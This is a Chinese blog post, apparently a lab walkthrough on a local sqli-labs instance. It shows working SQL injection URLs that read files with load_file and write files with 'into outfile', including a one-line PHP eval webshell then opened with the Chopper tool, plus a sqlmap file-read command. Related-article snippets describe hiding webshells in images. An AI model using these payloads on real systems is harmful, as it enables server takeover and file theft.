sql 上传文件 下载文件 一句话木马+菜刀 sqlmap

最新推荐文章于 2023-03-08 11:12:47 发布
最新推荐文章于 2023-03-08 11:12:47 发布
阅读量3.9k 收藏 6
点赞数
分类专栏: web python开发
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41071646/article/details/87854235
版权

这里说的内容可能比较多  但是都需要  高的权限 能够 创建删除 文件~~~~   然后

先说一下 下载文件吧  

  我们构造的链接是

http://127.0.0.1/sqli-labs-master/sqli-labs-master/Less-1/?id=0' union select 1,load_file("D:\\flag.txt"),3 --+

然后  我们的内容 如下 

 

可以看出  flag 已经被我们输入到网址里面了   然后 

我们说 上传文件 

http://127.0.0.1/sqli-labs-master/sqli-labs-master/Less-7/?id=-1'))  union select  1 , '<?php phpinfo();?>' , 3   into  outfile "D:\\phpstudy\\PHPTutorial\\WWW\\sqli-labs-master\\sqli-labs-master\\Less-7\\1.php"  --+

然后 文件中就写入了  

1    <?php phpinfo();?>    3  

然后 我们经过服务器 运行之后 就会发现   <?php phpinfo();?> 成功运行 

 显示出了php的信息等  

然后   就是用一句话木马 和 菜刀连接了

<?php @eval($_POST['pass']);?>

用 

http://127.0.0.1/sqli-labs-master/sqli-labs-master/Less-7/?id=-1'))  union select  1 , "<?php @eval($_POST['pass']);?>" , 3   into  outfile "D:\\phpstudy\\PHPTutorial\\WWW\\sqli-labs-master\\sqli-labs-master\\Less-7\\4.php"  --+

然后  再用菜刀连接 

 如图  搞定成功  

下面就是用sqlmap  来 确定  搞一波

 

py -2  sqlmap.py -u  "http://127.0.0.1/sqli-labs-master/sqli-labs-master/Less-7/?id=1" --file-read "D:\\FLAG.txt" --batch

 

 

 

 找到那个文件夹 

 然后找到原本的文件 

一样一样的~~~~~~~~~~~~~~~ 

pipixia233333
关注
  • 0
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Cknife 一句话连接工具.7z
07-17
Cknife里面有1.jsp一句话,以及nsa工具,在kali下java1.8下测试通过
菜刀连接图片一句话木马
热门推荐
qq_18831583的博客
04-22 2万+
1、先制作图片一句话木马: 找好一张图片如”fox.jpg“,并且准备好一句话脚本php文件fox.php,在图片所在文件夹打开cmd命令行,执行命令:copy fox.jpg/b+fox.php/a fox1.jpg,生成图片一句话文件fox1.jpg 接下来用notepad++打开fox1.php图片,看看一句话也没有写入到图片当中,如图,一句话已经写入刀图片当中: ...
【好奇心驱动力】DVWA(High)_菜刀连接图片一句话木马
高冷的宅先生
06-09 5940
1、环境准备 攻击机:kali2020.2(192.168.2.119) 测试靶机:Metasploitable2-Linux(192.168.2.113)(这里有个坑) 工具:AntSword(蚁剑)、菜刀 目的:上传图片一句话木马,使用蚁剑或者菜刀连接获取文件目录 2、图片一句话木马制作 copy命令 1.jpg是随意找的一个图片,a.php是最简单的一句话木马 #cmd执行命令 copy 1.jpg/b+a.php/a 0.jpg 执行结果如下,生成了新的0.jpg 查看0.jpg的内容,一
中国菜刀使用(图片上传漏洞)
m0_71088505的博客
07-03 1201
图片上传漏洞: ps:此教程为靶场实战,切勿用于非法用途 1.准备制作图片马,随便找到一张图片重命名为1.jpg 2.准备好一句话木马,这里我命名为1.php 3. 需要用到dos命令将两个文件合到一起,windows+R 输入cmd回车。找到存放文件的路径,输入命令:copy 1.jpg/b + 1.php/a 2.jpg 文件夹中会自动生成一个2.jpg文件。 4. 选择上传2.jpg 5.上传,使用bp抓包更改后缀,将filename后面的.jpg改为....
蚁剑与一句话木马
m0_55771794的博客
07-15 5659
目录 一句话木马 一个关于php的例子 入侵条件 蚁剑的下载与安装 在安装的时候注意 真题实践 一句话木马 先来说说一句话木马是什么东西 一句话木马,又简称(webshell),在很多渗透测试时,渗透人员会上传一句话木马到目前web服务目录继而提权获取系统权限。 举一个关于php的例子 <?php @eval($_POST['syc']);?> 它的原理呢,是利用文件上传漏洞,往目标网站中上传一句话木马,然后你就可以通过中国菜刀即可获取和控制整个网站目录。 ..
SQL注入上传一句话木马(转)
hanzhen668的博客
06-10 1291
SQL注入上传一句话木马
一句话木马渗透DVWA(内附caidao工具下载链接)
weixin_68989528的博客
03-08 547
一句话木马渗透DVWA(内附caidao工具下载链接)
一句话木马(godzilla)
weixin_59872639的博客
11-26 1419
下载godzilla 链接:https://pan.baidu.com/s/1zqZ_1I-oqFY4HvJiAJzqgw 提取码:vwlc 需要java环境 新建一个php文件 使用java打开godzilla 生成后导入新建的php文件中 将此文档导入目标服务器的 /var/www/html 打开网页后显示页面空白即为木马导入成功 ...
使用sqlmap+burpsuite进行中级sql注入
06-01
使用sqlmap+burpsuite进行中级sql注入,亲测可行
sql注入工具sqlmap源代码+常用指令
04-09
SQLMap是一款流行的开源SQL注入工具,用于自动化检测和利用Web应用程序中的SQL注入漏洞。它可以测试目标站点是否存在SQL注入漏洞,并探测数据库类型、操作系统、表名、列名等信息,进而将这些信息自动化地利用来获取...
mybatis sql文件热部署,mapping文件热部署插件
05-11
1.下载JRebel IntelliJ IDEA插件。https://www.jrebel.com/products/jrebel/download/nightly-build#tab-panel-7011 2.打开文件>设置。选择插件。 3.按从磁盘安装插件… 4.浏览到下载的存档,然后按OK。完成安装。
java开发基于SQLmapSQL注入工具源码.zip
06-01
基于SQLmapSQL注入工具源码.。基于SQLmap,使用Java开发 安装教程 安装JDK(需要有javafx) 安装Python 安装SQLmap 基于SQLmapSQL注入工具源码.。基于SQLmap,使用Java开发 安装教程 安装JDK(需要有javafx)...
sqlmap sql 注入测试工具
最新发布
03-06
sqlmap 可以很方便的测试sql 注入 安装后直接使用
unicorn学习(2)-》》》 unicorn的简单应用
qq_41071646的博客
01-31 4636
这个参考了一下ctf题 看了一篇国外的文章 感觉很不错 自己也拿来做一下看看 , hxp CTF 2017Fibonacci 嘻嘻 这个名字 斐波那契 看到了这个程序的反汇编代码 用的是递归来斐波那契 但是斐波那契 数字越大 他的值 就越不好找, 其实常规做法可以把这个算法还原 然后打一个斐波那契的表 map一下就ok 但是我们要用unicron, un...
unicorn学习(1)-》》》 unicorn的认识
qq_41071646的博客
01-30 2410
在家无聊,刷题刷的头晕,打算学点新知识。。 unicorn 这个东西算是一个模拟执行 可以模拟 arm x86 mips 等等平台的指令运行 前一段时间 还看到有人发用 unicorn写的一个调试器 打算自己也学习一下。 这里主要用python。。 现介绍一下基本的函数 还有成员 uc 注册一个mode uc(uc_arch,mode) 例子 Uc(UC_ARCH_AR...
爬虫IP代理
qq_41071646的博客
04-08 1664
写这篇文章的时候 内心还是比较焦灼的 re 看的头疼 只能看看python 来维持一下生活 然后在网上找了一些视频看 有了一些心得 就写下来 emmm #创建请求对象 request = urllib.request.Request(url) #动态的去添加head的信息 request.add_header("User-Agent","Mozi...
python 爬虫下载图片 以及对excel的处理
qq_41071646的博客
03-08 1620
先来说一下 python的下载图片吧 比如我们向看看美女的 图片 然后我们输入 美女 然后点击一个图片 发现 然后我们想把这个图片下载起来 其实很简单 import requests import urllib url='https://ss0.bdstatic.com/94oJfD_bAAcT8t7mm9GUKT-xh_/timg?image&quality...
sqlmap 上传木马 为什么是空文件
09-03
SQLMap 是一个自动化 SQL 注入工具,用于发掘和利用应用程序中的 SQL 注入漏洞。它提供了多种注入技术和方法,其中之一是通过上传木马来获取对目标系统的控制权。 上传木马是通过在受影响应用程序中找到一个允许...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值